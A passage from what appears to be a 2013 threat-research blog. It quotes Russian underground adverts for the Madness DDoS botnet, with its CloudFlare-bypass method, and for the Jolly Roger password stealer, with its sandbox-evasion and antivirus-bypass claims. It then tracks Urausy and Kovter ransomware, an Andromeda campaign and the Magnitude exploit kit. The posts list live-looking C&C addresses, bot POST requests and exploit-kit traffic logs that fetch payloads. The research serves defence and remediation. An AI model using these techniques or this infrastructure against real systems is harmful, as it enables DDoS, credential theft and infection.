exe command to load and run the EXE file. Does not stop the execution of other commands. The file is saved under the same name, under which he had been on the internet. Made three attempts to download the file . Example : exe = http://site.com/filename.exe

Control Panel :
We used a modified ~ 70 % PU from another set (purchased under a contract for change and resale ) by rewriting it almost completely, as it was found too many mistakes and did not like the code . Of course everything was corrected and optimized - New PU Enjoy !

Screenshots:
: screenshot: Screenshot | Screenshot (login screen)
: screenshot: Screenshot | Screenshot

Demo:
So, as the system is very powerful , and to demonstrate the need to only 15-20 boats that are always available - Sellers will try to demonstrate the power .

prices:
- Test License $ 0 ( only for checking the forums and testers. Updates are not provided )
- Basic License $ 500 (upgrade / Rebuild $ 50 upgrade to the new version $ 100 , the price of modules will be installed later)
- $ 950 full license ( all upgrades, rebuilds and modules are free)

discounts:
- 30% for the owners GBot / Andromeda / Dirt Dumper, basic license iBot, base / silver license Darkness
- 50 % for holders of gold and diamond license Darkness / iBot
- 20 % extra for those who acquired the products listed above are not more than a week ago.

payment
to accept POISON , WMR / WMZ / WMB, PM and LR. And as any currency through an exchanger.

Warranties :
Willingness to work through the guarantor of any known forum.

installment plan
In order to have a reputation and / or certificates of a system for people installments. Discussed individually.

Contacts
- Celler 1 ICQ: 902300
- Celler 2 ICQ: 903400
- Project Manager ICQ: 395891570

Ready to be tested under the administration of the forum.
------------------------------------------

Then he replied about CloudFlare protection :

------------------------------------------

Обход защиты CloudFlare.

Защитный комплекс CloudFlare базируется на определении браузера за счет выполнения в нем Java скрипта, после чего клиенту выдается уникальная cookies.

Бот, как и браузер, теоретически может выполнить Java скрипт. Огромная сложность в том, чтобы уместить необходимый объем математических функций в скромный размер билда бота, однако некоторые экземпляры с поставленое задачей справляются!

Рассмотрим пример тестирования сервера http://server.com, защищенного CloudFlare с помощью комплекса с++ Madness 1.08:

1) Ботнету отдается команда dd7=http://server.com, после чего начинаются реквесты на сервер с помощью системной библиотеки UrlMon. Как видно по логам сервера и сниферу, ботам возвращается ошибка 302, что означает работу защиты.

2) Ботнету отдается команда cga=http://server.com и боты запрашивают cookies для авторизации. Выполнив Java скрипт каждый бот получает уникальную (для его ip и useragent) cookie которую тут же включает в заголовок пакета. По логам видно что запросы на сервер проходят в нормальном режиме и возвращаемый контент соответствует контенту вебсайта на нем!

Q) Почему нельзя сделать это автоматически?

A) В зависимости от настроек защиты cookie может изменяться в произвольном интервале и авторизацию нужно проходить вновь. Пока что автоматика не справляется с этим так, как этого делает человек-профессионал. Слишком частый интервал проверки сильно ухудшает юзабилити сайта, т.к. обычные пользователи видят качели CloudFlare каждый Божий секунд.

Q) Можно ли использовать этот метод постоянно, для любых целей?

A) Можно, но не рекомендуется. Т.к. dd7 сама по себе более медленная атака в сравнении с dd1, а тут еще нагрузка увеличивается из-за составления спецпакета обхода защиты.

Новости проекта

С сегодняшнего дня с нами работает еще один селлер отдела продаж: iSupport (709186)

ICQ: 902300, 903400, 709186

JAB: damrai13@jabber.ru

------------------------------------------
Translated by google as :

------------------------------------------

Protection bypass CloudFlare.

CloudFlare security complex is based on the determination of the browser by running Java script in it , after which the client is issued a unique cookies.

Both, like the browser can theoretically run Java Script . The great difficulty is to fit the required amount of mathematical functions in the modest size of the build bot , however, some instances of coping with the task !

Consider the example of a test server http://server.com, protected by CloudFlare complex + + Madness 1.08:

1) A botnet command is given dd7 = http://server.com, then start rekvest to the server using the system library UrlMon. As can be seen on the server logs and sniffer , 302 bots error is returned , which means job security .

2) A botnet command is given cga = http://server.com cookies and bots request for authorization. Java script executing each bot has a unique (for its ip and useragent) cookie which immediately includes the packet header . According to the logs can be seen that the requests to the server are in normal mode and returns the content of the website corresponds to the content on it!

Q) Why can not I do it automatically?

A) Depending on the security settings, cookie can be changed in an arbitrary interval and authorization need to go again . So far, the automation can not cope with it as it makes a person a professional . Too frequent inspection interval greatly reduces the usability of the site , as ordinary users see every single swing CloudFlare seconds.

Q) Can I use this method all the time, for any purpose ?

A) It is possible, but not recommended. Since dd7 itself is a slow attack , compared with dd1, and then there's the load is increased due to the preparation of the special package to bypass the protection .

News of the project

From today, we are working with another Celler Sales: iSupport (709186)

ICQ: 902300, 903400, 709186

JAB: damrai13@jabber.ru

------------------------------------------

Madness C&C

Botnet Operator testing his baby.

Thanks to Arbor Networks ASERT Threat Intelligence for additional info.

↧

Urausy is going Regional in United States

October 15, 2013, 7:10 am

≫ Next: Jolly Roger Stealer - Stoberox.B(?)/Zlader.F

≪ Previous: Meet Madness Pro or Few days rise of a Ddos Botnet

As long as there will be people paying...I guess we'll have news to write about Ransomware.
Today I faced a new Design for Urausy in United States...Was wondering what was making it new.

See :

Urausy - Piece of Design US-NC - 2013-10
for Victims from North Carolina
2013-10-15

From Country specific Urausy design are now moving down to the State level.
One more :

Urausy - US-HI - 2013-10-15
Hawaii

If for some reason, the server can't determine the region, then you'll be granted the "old" Urausy Design as Failover :

Urausy US-Region Failover 2013-10-15
(was previous global US design)

Many States in one Picture :

State targeted Urausy for US in one Image
(too small ? full size here : http://i.minus.com/iK8bXuvUSnOkY.png (8Mb) )

Infra :
I can see (but there are obviously more (in same range not activated, and in other unknown to me ranges) ) 120 ips that can serve indiferently as Kore Exploit Kit or as Urausy C&C.

184.82.177.22
41390 | 195.3.144.0/22 | RN-DATA | LV | ALTNET.LV | RN DATA SIA

195.3.147.17
41390 | 195.3.144.0/22 | RN-DATA | LV | ALTNET.LV | RN DATA SIA

46.161.27.166 up to 254
44050 | 46.161.27.0/24 | PIN | RU | PINSPB.RU | PETERSBURG INTERNET NETWORK LTD.

46.4.179.110
46.4.18.152
46.4.199.234
46.4.199.244
46.4.238.17 up to 30
24940 | 46.4.0.0/16 | HETZNER | DE | YOUR-SERVER.DE | VPSSERVER

93.189.44.145
41853 | 93.189.44.0/22 | NTCOM | RU | NT-COM.RU | LIMITED LIABILITY COMPANY NTCOM

94.242.206.252
94.242.206.32
94.242.206.37
94.242.206.61
94.242.206.73 up to 76
94.242.206.79
94.242.206.83
94.242.206.96
5577 | 94.242.192.0/18 | ROOT | LU | ROOT.LU | ROOT SA

By the way OT, here is a German Design which is new to me (but long time since i last checked) :

New (to me) variant for
Urausy DE 2013-10

Files : Here(Owncloud via goo.gl) (All the Design I was able to gather :
Arizona, California, Georgia, Hawaii, Illinois, Indiana, Maryland, Nevada, New Jersey, New-York, North Carolina, Ohio, Pennsylvania, Texas, Utah, Washington )

Read More :
The missing link - Some lights on "Urausy" affiliate - 2013-05-29 <-- if you want to know more on what is behind.

Urausy Ransomware - July 2013 Design Refresh - "Summer 2013 Collection" 2013-07-28Urausy Lockscreen: Your computer will remain locked for 3 days, 11 hours and 20 minutes! - 2013-07-24 - Jaromir Horejsi - Avast
Urausy Ransomware - Arab world targeted 2013-04-06

Urausy: Colorfull design refresh (+HR) & EC3 Logo 2013-02-09

↧

Jolly Roger Stealer - Stoberox.B(?)/Zlader.F

October 20, 2013, 6:13 am

≫ Next: Kovter becomes even more abominable . Also add new targets.

≪ Previous: Urausy is going Regional in United States

Piece of Jolly Roger Stealer Advert

Original Text of the Advert

------------------------------------------

Jolly Roger Stealer - обновленная система сбора па, Стилер пассов с функционалом лоадера

Доброго времени суток, уважаемое black-hat сообщество!

Предлагаю вашему вниманию систему по сбору паролей "Jolly Roger Stealer".

Система представляет собой тихий нерезидентный софт, похищающий пароли пользователя от различных ресурсов и отправляющий их на сервер.

Технические характеристики:

- Малый размер (вес ~37 кб некриптованный и непакованный)

- Не выбрасывает из себя никаких DLL/файлов, не используются сторонние библиотеки, файлы и тд.

- Стабильная работа в Windows XP/2003/Vista/7/8 (x32/x64)

- Работа в любых учетных записях (UAC - on/off ; admin/user/guest)

- Нет оповещений от UAC (Vista/7) и службы безопасности системы

- Динамический импорт части API функций по хешам от их имен

- Некое подобие антиэмуляции (насколько это возможно в Ring3)

- Антиотладка (обнаружение активной ринг3 отладки)

- Не содержит в себе статичных текстовых строк (данные генерируются в риал-тайме)

- Шифрование передаваемых данных

- Совместим с любыми крипторами/пакерами/протекторами

(не используются сторонние библиотеки, файлы и тд. стандартный ЕХЕ файл без TLS, EOF, etc.)

- Детект присутствия Sandbox'ов и некоторых проактивных защит

(при их обнаружении бот прекращает свое выполнение и безопасно самоудаляется)

Детектируемые SandBox'ы:

+ JoeBox (3 variants)

+ SandboxIE

+ SunBelt (3 variants)

+ ThreadExpert (2 variants)

+ Sandbox (1,2)

+ Norman SandBox

+ Anubis (2 variants)

+ CWSandbox

Детектируемые виртуальные машины:

+ Virtual PC

+ VirtualBox

+ VMware

+ Parallels Workstation

+ QEMU

Детектируемые снифферы:

+ Wireshark

Детектируемые Ring3 / Ring0 отладчики:

+ OllyDBG

+ Immunity Debugger

+ WinDbg

+ W32DAsm

+ IDA

+ SoftICE

+ Syser

+ TRW

+ TWX

- Обход фаерволов и проактивных защит путем инжекта Payload'a в доверенный процесс (настройки по умолчанию)

Тесты производились на следующих продуктах с последними обновлениями:

AVG Internet Security 2012 - обходит

Avira Premium Security Suite 10.0.0.608 - обходит

BitDefender Internet Security 2012 - обходит

F-Secure Internet Security 2011 - обходит

Jetico Personal Firewall 2010 - обходит

Norton Internet Security 2012 - обходит

Sunbelt Personal Firewall 4.6.1861.0 - обходит

G Data InternetSecurity 2012 - обходит

Trend Micro Titanium Internet Security 2012 - обходит

Dr.Web Security Space Pro 7 - обходит

ESET NOD32 Smart Security 5 - обходит

Panda Internet Security 2012 - обходит

Malware Defender 2.7.3.0002 - обходит

Kaspersky Internet Security 2012 - обходит

В некоторых случаях необходим хороший крипт! (пример - KIS 2012)

- Детект проблемных продуктов защиты, которые данный код категорически не в силах

oбойти и самоудаление в случае их обнаружения

- Поддержка получения и расшифровки паролей от следующих программ (актуальных последних версий):

+ FAR Manager

+ Total Commander

+ WS_FTP

+ CuteFTP

+ FlashFXP

+ FileZilla

+ FTP Commander

+ BulletProof FTP

+ SmartFTP

+ TurboFTP

+ FFFTP

+ CoffeeCup FTP

+ CoreFTP

+ FTP Explorer

+ Frigate3 FTP

+ SecureFX

+ UltraFXP

+ FTPRush

+ WebSitePublisher

+ BitKinex

+ ExpanDrive

+ ClassicFTP

+ Fling

+ SoftX

+ Directory Opus

+ FreeFTP

+ DirectFTP

+ LeapFTP

+ WinSCP

+ 32bit FTP

+ NetDrive

+ WebDrive

+ FTP Control

+ Opera

+ WiseFTP

+ FTP Voyager

+ Firefox

+ FireFTP

+ SeaMonkey

+ Flock

+ Mozilla Suite Browser

+ LeechFTP

+ Odin Secure FTP Expert

+ WinFTP

+ FTP Surfer

+ FTPGetter

+ ALFTP

+ Internet Explorer

+ Dreamweaver

+ DeluxeFTP

+ Google Chrome

+ Chromium

+ SRWare Iron

+ ChromePlus

+ Bromium

+ Nichrome

+ Comodo Dragon

+ RockMelt

+ K-Meleon

+ Epic

+ Staff-FTP

+ AceFTP

+ Global Downloader

+ FreshFTP

+ BlazeFTP

+ NETFile

+ GoFTP

+ 3D-FTP

+ Easy FTP

+ Xftp

+ FTP Now

+ Robo-FTP

+ LinasFTP

+ Cyberduck

+ Putty

+ Notepad++ (NppFTP)

+ CoffeeCup Visual Site Designer

+ CoffeeCup Sitemapper

+ FTPShell

+ FTPInfo

+ NexusFile

+ FastStone Browser

+ CoolNovo

+ WinZip

+ Yandex.Internet

+ MyFTP

+ sherrod FTP

+ NovaFTP

+ Windows Mail

+ Windows Live Mail

+ Pocomail

+ Becky!

+ IncrediMail

+ The Bat!

+ Outlook

+ Thunderbird

+ FastTrackFTP

Скриншоты:

http://i019.radikal.ru/1308/91/598ac0e5c9b4.png

http://s019.radikal.ru/i601/1308/42/0213cf6c75a8.png

[redacted - thx Denis]

(апдейт от 03.10.13)

Также присутствует функционал лоадера:

+ Неограниченное количество заданий на закачку файлов

+ Размер файлов не ограничен

+ Возможность разделения заданий по странам, а также указание лимита загрузок

+ В случае неудачного запуска загруженного файла он будет удален

+ Проверка файла на PE перед запуском (стартуем только исполняемые файлы)

+ Удобное управление заданиями и статистика в админ-панели

+ Все данные по заданиям и репортам подвергаются 2х-уровневому шифрованию в оба направления (админка <-> бот)

http://s020.radikal.ru/i713/1310/de/752434b61d42.png

http://i016.radikal.ru/1310/59/5125d395c417.png

+ В админку добавлен парсер для выборки нужных акков

http://s020.radikal.ru/i717/1310/21/20c97535bd51.png

Прайс: билд = 500$

ребилд = 30$

ONLY PERFECTMONEY!

Контакты: jr@exploit.im

------------------------------------------

Translated by google as:

------------------------------------------

Jolly Roger Stealer - updated collection system pas Steeler passes with a functional loader

Good day, dear black-hat community!

I offer you a system to collect passwords "Jolly Roger Stealer".

The system is a quiet resident software that steals user passwords from a variety of resources and sending them to the server .

Specifications:

- Small size (weight ~ 37 kb nekriptovanny and nepakovanny )

- Do not throw yourself out of any DLL / file does not use third-party libraries , files, and so on.

- Stable work in Windows XP/2003/Vista/7/8 (x32/x64)

- Work in any account (UAC - on / off; admin / user / guest)

- No alerts from UAC (Vista / 7) and the security of the system

- Dynamic imports of API functions for hashes of their names

- A sort of anti-emulation techniques (as far as possible in the Ring3)

- Anti debugging (finding active ring3 debugging)

- Does not contain static text strings (the data generated in the half - rial )

- Encryption of data transmitted

- Compatible with any kriptore / packers / protectors

( do not use third-party libraries , files, and so on. standard EXE file without TLS, EOF, etc.)

- Detect the presence Sandbox'ov and some proactive protection

( if they are detected bot stops its execution and safely deletes itself )

Detectable SandBox'y :

+ JoeBox ( 3 variants)

+ SandboxIE

+ SunBelt ( 3 variants)

+ ThreadExpert ( 2 variants)

+ Sandbox (1,2)

+ Norman SandBox

+ Anubis ( 2 variants)

+ CWSandbox

Detectable virtual machines :

+ Virtual PC

+ VirtualBox

+ VMware

+ Parallels Workstation

+ QEMU

Detectable sniffers :

+ Wireshark

Detectable Ring3 / Ring0 debuggers :

+ OllyDBG

+ Immunity Debugger

+ WinDbg

+ W32DAsm

+ IDA

+ SoftICE

+ Syser

+ TRW

+ TWX

- Bypass firewalls and proactive protection by inzhekta Payload'a into a trusted process ( the default setting )

Tests were carried out on the following products with the latest updates :

AVG Internet Security 2012 - bypasses

Avira Premium Security Suite 10.0.0.608 - bypasses

BitDefender Internet Security 2012 - bypasses

F-Secure Internet Security 2011 - bypasses

Jetico Personal Firewall 2010 - bypasses

Norton Internet Security 2012 - bypasses

Sunbelt Personal Firewall 4.6.1861.0 - bypasses

G Data InternetSecurity 2012 - bypasses

Trend Micro Titanium Internet Security 2012 - bypasses

Dr.Web Security Space Pro 7 - bypasses

ESET NOD32 Smart Security 5 - bypasses

Panda Internet Security 2012 - bypasses

Malware Defender 2.7.3.0002 - bypasses

Kaspersky Internet Security 2012 - bypasses

In some cases, a good crypt ! (Example - KIS 2012)

- Detect the problem of security products that this code can not categorically

oboyti samoudalenie and when found

- Support for receiving and decrypting passwords of the following programs ( current latest version ) :

+ FAR Manager

+ Total Commander

+ WS_FTP

+ CuteFTP

+ FlashFXP

+ FileZilla

+ FTP Commander

+ BulletProof FTP

+ SmartFTP

+ TurboFTP

+ FFFTP

+ CoffeeCup FTP

+ CoreFTP

+ FTP Explorer

+ Frigate3 FTP

+ SecureFX

+ UltraFXP

+ FTPRush

+ WebSitePublisher

+ BitKinex

+ ExpanDrive

+ ClassicFTP

+ Fling

+ SoftX

+ Directory Opus

+ FreeFTP

+ DirectFTP

+ LeapFTP

+ WinSCP

+ 32bit FTP

+ NetDrive

+ WebDrive

+ FTP Control

+ Opera

+ WiseFTP

+ FTP Voyager

+ Firefox

+ FireFTP

+ SeaMonkey

+ Flock

+ Mozilla Suite Browser

+ LeechFTP

+ Odin Secure FTP Expert

+ WinFTP

+ FTP Surfer

+ FTPGetter

+ ALFTP

+ Internet Explorer

+ Dreamweaver

+ DeluxeFTP

+ Google Chrome

+ Chromium

+ SRWare Iron

+ ChromePlus

+ Bromium

+ Nichrome

+ Comodo Dragon

+ RockMelt

+ K-Meleon

+ Epic

+ Staff-FTP

+ AceFTP

+ Global Downloader

+ FreshFTP

+ BlazeFTP

+ NETFile

+ GoFTP

+ 3D-FTP

+ Easy FTP

+ Xftp

+ FTP Now

+ Robo-FTP

+ LinasFTP

+ Cyberduck

+ Putty

+ Notepad + + (NppFTP)

+ CoffeeCup Visual Site Designer

+ CoffeeCup Sitemapper

+ FTPShell

+ FTPInfo

+ NexusFile

+ FastStone Browser

+ CoolNovo

+ WinZip

+ Yandex.Internet

+ MyFTP

+ Sherrod FTP

+ NovaFTP

+ Windows Mail

+ Windows Live Mail

+ Pocomail

+ Becky!

+ IncrediMail

+ The Bat!

+ Outlook

+ Thunderbird

+ FastTrackFTP

Screenshots:

http://i019.radikal.ru/1308/91/598ac0e5c9b4.png

http://s019.radikal.ru/i601/1308/42/0213cf6c75a8.png

( update on 3/10/13 )

Also there is a functional loader :

+ Unlimited number of tasks to download the file

+ File size is unlimited

+ Possibility to divide tasks across countries, as well as an indication limit of downloads

+ In case of an unsuccessful launch the downloaded file, it will be removed

+ Check the file to PE before starting ( we start only executables )

+ Easy task management and statistics in the admin panel

+ All data on assignments and report are 2- tier encryption in both directions ( admin page <- > bot )

http://s020.radikal.ru/i713/1310/de/752434b61d42.png

http://i016.radikal.ru/1310/59/5125d395c417.png

[redacted - thx Denis]

+ Parser added to the admin panel to select the desired akkov

http://s020.radikal.ru/i717/1310/21/20c97535bd51.png

Price : build = $ 500

Rebuild = $ 30

ONLY PERFECTMONEY!

Contact : jr@exploit.im

------------------------------------------

Note price has moved to :

билд = 350$

ребилд = 15$

on 2013-10-17

It seems Microsoft name the sample associated to this panel : Stoberox.B (but i wonder if it's related to other samples named Stoberox by Microsoft)

Eset name it : Zlader.F

Stoberox C&C - Login Screen

Here is how it looks inside :

Stoberox C&C - Bots Statistic

Stoberox C&C - Logs

Email Lists

Stoberox C&C - Logs Search

Stoberox C&C - Create Tasks

Storebox - Tasks Statistic

"pony + админка spyeye ? " - GrandSoft

<edit 2hours after post: Fixed typo : Zlader != Zlater />

Sample: Here (OwnCloud)

C&C call:
81.177.141.211POST /jr2/gate.php HTTP/1.0
8342 | 81.177.128.0/18 | RTCOMM | RU | JINO.RU | AVGURO TECHNOLOGIES LTD. HOSTING SERVICE PROVIDER
Host: esco.myjino.ru
Accept: */*
Accept-Encoding: none
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Type: application/x-www-form-urlencoded
Connection: Close

Content-Length: 196

Analysis by Joe Sandbox Cloud

↧

Kovter becomes even more abominable . Also add new targets.

October 21, 2013, 2:04 pm

≫ Next: Big Andromeda Campaign back on track. From Sweet Orange to Neutrino

≪ Previous: Jolly Roger Stealer - Stoberox.B(?)/Zlader.F

In Kovter NL Design

Kovter is following Revoyem's path.
Double shock on victims and new targeted countries.

This evolution has been spotted by Rich from Malwarebytes

Malware-Ransomers Getting Very Sick. Now popping child porn links in browser before blocking computer! #ransomer
— Shadowwar (@RichardMatteo1) October 21, 2013

In this case the first part of the work (shocking victims with CP website) is not done by traffer/web redirection prior to infection, as some traffer for Styx Revoyem Thread were doing, but by the malware itself.

Kovter fiddler Trace

2013-10-21

(Thx for comment pointint a non blurred zone)

I made a design gathering session. They dropped the Prism Theme for US and are back to former design :

Kovter US - Default (failover) 2013-10-21

They already added Germany at the end of September ( Spotted by Malekal on the 2013-09-29 )

Kovter DE 2013-10-21

And now new design are : ES, FR, GB, IT, NL , TR

Kovter FR 2013-10-21

Kovter ES 2013-10-21

Kovter GB 2013-10-21

Kovter IT 2013-10-21

Kovter NL 2013-10-21

Kovter TR 2013-10-21

Files :~~7 kovter samples (owncloud via goo.gl)~~
~~Disclaimer : You have been warned of what those samples are doing.~~
Sorry. Removed.

Exploit Kit pushing it :
The fast moving Sakura (domains in .pl ) previously on
78.129.143.10

20860 | 78.129.128.0/17 | IOMART | GB | IOMARTHOSTING.COM | IOMART HOSTING LIMITED

Now on

85.17.122.118:97
16265 | 85.17.0.0/16 | LEASEWEB | NL | LEASEWEB.COM | LEASEWEB B.V.

C&C :
50.7.193.124
30058 | 50.7.192.0/19 | FDCSERVERS | CZ | FDCSERVERS.NET | FDCSERVERS.NET
svoirdwiz .biz
svoirdwiz .org

↧

Big Andromeda Campaign back on track. From Sweet Orange to Neutrino

October 23, 2013, 4:52 am

≫ Next: Magnitude EK : Pop Pop !

≪ Previous: Kovter becomes even more abominable . Also add new targets.

This is not the usual post I write but decided to go on as the campaign is quite big (enough to modify the EK market share feeling) and I have some compromised domain to share for remediation (see at the end)

A big campaign was active from at least 2013-09-27 to 2013-10-14.
A huge number of compromised website were conditionally redirecting to a Sweet Orange pushing Andromeda : (Post by Sucuri about this campaign)

Sweet Orange 82 2013-09-27
Payload : Andromeda

One of the payload : 82735517dd73de39a17c01a74c4fa232 nicely named by Microsoft (as often)

The campaign was really widespread and was imo responsible for the feeling from some that Sweet Orange was prevailing after Paunch's Arrest (so maybe in "tilt number" but I think most actors are on Neutrino, Magnitude and Nuclear Pack)

The campaign suddenly stopped redirecting to Sweet Orange on 2013-10-14 redirecting instead to google.com and the day after to [rotating].sytes.net/atb/counter.php then to google.

(Note: at same time 4-5 other Sweet Orange threads I was following also disappeared which made me tweet few days later

Sweet Orange out of the "battlefield" since around 60 hours. Is something happening here too ?
— kafeine (@kafeine) October 18, 2013

Note : have been pointed to at least 2 SWO threads that are still active )

That campaign has a huge place
by Sucuri

That campaign was still "on hold" yesterday ( BadwareBusters thread)

On Hold Campaign. Redirectin to Google
2013-10-22

The infection process is on again but redirecting now to Neutrino.
(it's enough to assume that actors can speak russian or are better than most of us at using google translate)

Neutrino thread pushing Andromeda

Having no access to compromised server, based on the way the redirection is handled I thought it was driven by an Apache Rogue module (Darkleech or CDorked installed on compromised server via Cpanel/Parallels Plesk server vulns) but it seems it's more likely compromised Joomla/Wordpress

Payload I got (it's obviously rotating) :
1074b843c0b6e783ee1314c9759067a2 (sample - VT - Malwr )
~~Am not 100% sure it's Andromeda but chances for it are really high...~~

@kafeine This is is Andromeda 2.7 ( CKF81X) i confirmed .67c7f325d951a444f203489274a0ca62 is the actual payload has after unpacking.
— Raashid Bhat (@raashidbhatt) October 23, 2013

@kafeine here is the c2c config http://t.co/erF2v7WqkW currently c2c is replying with no updates
— Raashid Bhat (@raashidbhatt) October 23, 2013

-----
46.22.211.60
34702 | 46.22.208.0/20 | WAVECOM | EE | WAVECOM.EE | AKTSIASELTS WAVECOM
POST /rukomorsdx/forum.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Mozilla/4.0
Host: base.thecreatureteacher.com
Analysis by Joe Sandbox Cloud
-----

At least >8000 domains were redirecting to the rotator (but I think it's far more than than).
http://pastebin.com/raw.php?i=1vFNKdSW (Please use for remediation - some Cert (CA/CH/CZ/FR/FI/PL) should have already been informed)

<edit1 : 2013-11-01>
After few days out (after that post). They are back again. Using intermediate redictor in : [rotating].dezit/counter.php

Counter-Andro gang back on Neutrino

Payload : 3b75c1b705ce8f0e4e3a09d137a842c1
</edit1>

Read More :
Neutrino: Caught in the Act - Karmina Aquino & Daavid Hentunen - 2013-10-23 - F-Secure
Malware iFrame Campaign from Sytes(.)net Daniel Cid - 2013-10-03 Sucuri.net
Hello Neutrino ! (just one more Exploit Kit) 2013-03-17 - last update 2013-10-03

Inside Andromeda Bot v2.06 Webpanel / AKA Gamarue - Botnet Control Panel 2012-07-02

↧

Magnitude EK : Pop Pop !

October 25, 2013, 6:14 pm

≫ Next: CVE-2013-2551 and Exploit Kits

≪ Previous: Big Andromeda Campaign back on track. From Sweet Orange to Neutrino

Magnitude

Magnitude is a community name choosen for an Exploit Kit previously referred to as "Popads".
Why Popads ?

Many days after it was first spotted, the driveby was being done using Malvert pushed via PopAds
And all landing were ending with popads.com

Magnitude 2013-03-22
Here referer : sweerl.biz

PopAds being a legit company fighting against malverts, we had to choose a proper name.

As we don't know its real name (if one), a video proposed by Will Metcalf from Emerging Threats made a consensus

Community - Magnitude (Pop pop!)

(link : http://www.youtube.com/watch?v=q-_4mcYsQdE )

Since Paunch's Arrest we are seing more and more Magnitude.

User on an Underground Forum seeking for Magnitude (^^) to grow his botnet
The world upside down.

I would rank it 2nd in term of users (Behind Neutrino, and before Kore and Nuclear Pack)

Now let's see how it's "weaponized".
Disclaimer : as usual I may hide information on stuff that seems broken.

CVE-2013-2463 with click2play bypass :

Spotted inside 2013-10-19 but was maybe there since 1 or 2 weeks.

CVE-2013-2463 + c2p bypass in Magnitude 2013-10-25
After that the computer is...slightly infected.

GET http://khncudlm.7rahdeqi .info/?7186035589665d9b107f00af07370800=v12&ed37c4cb4cd2b288135b06da53053859=[fakeUpperReferer].com&0e26f8b9e160a8b0e6176ce00d16f5db=[redacted].com
200 OK (text/html)

Magnitude Landing - Highlighted : the piece of code that won't be 404
rejected (UA based) with the configuration presented to the EK

GET http://khncudlm.7rahdeqi.info/80560ef3eddd08c9d455d41af5ea8592/cc84e758a3b4611de79628ee89895e13.swf
404 Not Found (text/html)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/131548a8413b7f63f89dff19f8563a5e
200 OK (text/html) (this is for CVE-2013-2551 see later)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/28322e8e52bc381204f0b1e65c40e174
200 OK (text/html)

jnlp for Click2Play Bypass on jre17u21

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/48f8d65ddc1187cb0a36b0c7e0c95b9f
404 Not Found (text/html)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/48f8d65ddc1187cb0a36b0c7e0c95b9f
404 Not Found (text/html)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/0f924936b800ba82b17b2085bfd53753.jar
200 OK (application/x-java-archive) 1c3d690421a56c5c67e211d747df9b72

Piece of CVE-2013-2463 in Magnitude Jar

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/0f924936b800ba82b17b2085bfd53753.jar
200 OK (application/x-java-archive)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/48f8d65ddc1187cb0a36b0c7e0c95b9f
404 Not Found (text/html)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/48f8d65ddc1187cb0a36b0c7e0c95b9f
404 Not Found (text/html)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/0
200 OK (text/html) Payload 1 c2a974e04298b557f976818200c879ab Stitur Ransomware

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/u.class
404 Not Found (text/html)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/u.class
404 Not Found (text/html)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/1
200 OK (text/html) Payload 2 ba923eb3b0968a58a090db1e3079080d <- Redyms. Thx Kimberly (Stopmalvertising).

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/2
200 OK (text/html) Payload 3 f577eef07ef8331311f93fe1918c6cc6 Kelihos Spambot/loader

(Out of scope -- do :
85.255.57.253
GET /cuper02.exe HTTP/1.0 --> 004874bb466e6b8eb3dd7b09f7e3855d )

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/3
200 OK (text/html) Payload 4 (empty)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/4
200 OK (text/html) Payload 5 4903405b85b5584fa93a1e4591b80f64 Zaccess

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/5
200 OK (text/html) Payload 6 818f9ea202ce30645d2fb547ff1829f8 Vawtrak (Thx @virtualalloc for the information)

Note : 5 payloads...among which a Ransomware...not sure beneficiary(ies) of the other payloads would appreciate as after Ransomware computer goes for cleaning. Explanation ? I would say the owner of this Magnitude thread is selling loads for same traffic to different customers/affiliates.

CVE-2011-3402 :

The CVE is inside (see below) but couldn't get it to fire as it's overlaping with CVE-2013-2551.
Have some idea to trigger it. Will maybe update later.

CVE-2012-0507 :

I made the pass on the "ru8080" thread. (Ex : /news/ BH EK )

CVE-2012-0507 Pass in Magnitude

So I was expecting a ZeusGameOver (Zeus P2P)...nada. Strange.....

GET http://ilkbxnmtce.1deepinsget .info/?e15023ac04e9f62ad61f23a2439a9b1e=29
200 OK (text/html)

Magnitude Landing - 2013-10-25
Highlighted the code that won't UA 404.
(3 jar call (?)<embed> - Firefox - <object> IE <applet> has been deprecated )

GET http://ilkbxnmtce.1deepinsget .info/ff498283b05fd88b573e0cce15b22de5.eot
200 OK (application/vnd.ms-fontobject) CVE-2011-3402 <--

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/09c164f4b0f930b8c10c476ec5dbfbec.swf
404 Not Found (text/html)

GET http://ilkbxnmtce.1deepinsget.info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/8cc36c1a70beae826a15bb7df6ab5b1d
200 OK (text/html) CVE-2013-2551 (see later)

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/a9c055da58058587affc7224687f99db
404 Not Found (text/html)

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/594ce31549c12857a01c64d38c91007c
200 OK (application/x-java-archive) b075fbbe5e96e73a9a597062d6c01444

Piece of CVE-2012-0507 in Magnitude Jar

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/594ce31549c12857a01c64d38c91007c
200 OK (application/x-java-archive)

